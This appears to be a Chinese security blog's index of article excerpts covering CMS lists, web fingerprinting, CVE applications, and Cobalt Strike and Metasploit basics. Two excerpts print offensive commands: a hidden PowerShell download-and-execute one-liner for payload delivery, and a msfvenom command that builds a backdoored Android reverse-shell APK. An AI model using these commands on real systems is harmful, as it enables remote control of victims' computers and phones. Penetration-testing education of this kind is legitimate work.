摘要:
一、HackingLoops 网址:https://www.hackingloops.com/ 这是一个博客网站,主要面向初级水平的,网站上有许多非常有用的工具以及检验分享。 二、XCTF_OJ 练习平台 网站:https://adworld.xctf.org.cn/ XCTF-OJ是由XCTF组委 阅读全文
摘要:
总结的10款基于PHP的免费CMS,想要通过PHP+MYSQL搭建网站的朋友可以从中参考。要查看详细介绍可以看BBon的原文,这里只是简单侃一下。 Joomla! Joomla!的前身是Mambo的开源码计划, Drupal 直逼Joomla!的开源CMS,不过貌似用户群还是没有Joomla!多。 阅读全文
摘要:
一、网站指纹(web指纹) Web指纹定义:Web指纹是一种对目标网站的识别技术,通过识别网站所使用的服务器、运行的脚本、安装的CMS等信息对目标进行精准的分类和定位。Web指纹识别可以帮助安全研究人员在安全测试中快速了解目标网站的基本信息,有助于搜索其相关漏洞。 二、CMS简介 内容管理系统(Co 阅读全文
摘要:
安全圈的老人,也是要给自己刷点金了,趁着23年底工作不忙,申请了3个CVE,都是简单的CMS中的CSRF漏洞,今天已经审批通过了。编号就不发了。 这些漏洞好像CNVD也能申请,今天再写个CNVD申请。加油把。。。 阅读全文
摘要:
冯先生问丁力:“阿力,你知道穷人最缺的是什么吗?” 丁力毫不犹豫地回答说:“穷人为了填饱肚子,当然是缺钱了,缺钱。” 冯先生摇了摇头说:“两个字,野心,穷人最缺的就是成为人上人的野心。” 是啊,穷人最缺的,并不是钱,而是成为人上人的野心。 阅读全文
摘要:
Scripted Web Delivery 为payload提供web服务以便下载和执行 相关流程如下: Step1: Step2:设置相关配置 Step3:生成payload命令 powershell.exe -nop -w hidden -c "IEX ((new-object net.webc 阅读全文
摘要:
CS简介 Cobalt Strike(简称CS)是一个为对手模拟和红队行动而设计的平台,主要用于执行有目标的攻击和模拟高级威胁者的后渗透行动,分为服务器和客户端。 模式: Cobalt Strike使用C/S架构(client/server),Cobalt Strike的客户端连接到团队服务器,团队 阅读全文
摘要:
PoC: 全称“Proof of Concept”,中文“概念验证”,常指 段漏洞证明的代码。 Exp: 全称“Exploit”,中文“利用”,指利用系统漏洞进行攻击的动作作。 Payload: 中文“有效载荷”,指成功 exploit 之后,真正在目标系统执行的代码或指令 RCE: RCE(rem 阅读全文
摘要:
1、首先通过MSF,生成手机client端程序,其中需要配置server端IP和port; msfvenom主要用来生成带后门的软件 msfvenom -p android/meterpreter/reverse_tcp lhost=172.20.10.4 lport=1250 > jd.apk 2 阅读全文
摘要:
一、Metasploit 渗透测试框架介绍 (1)基础库 metasploit基础库文件位于源码根目录路径下的libraries目录中,包括Rex,framework-core和framework-base三部分。 Rex是整个框架所依赖的最基础的一些组件,如包装的网络套接字、网络应用协议客户端与服 阅读全文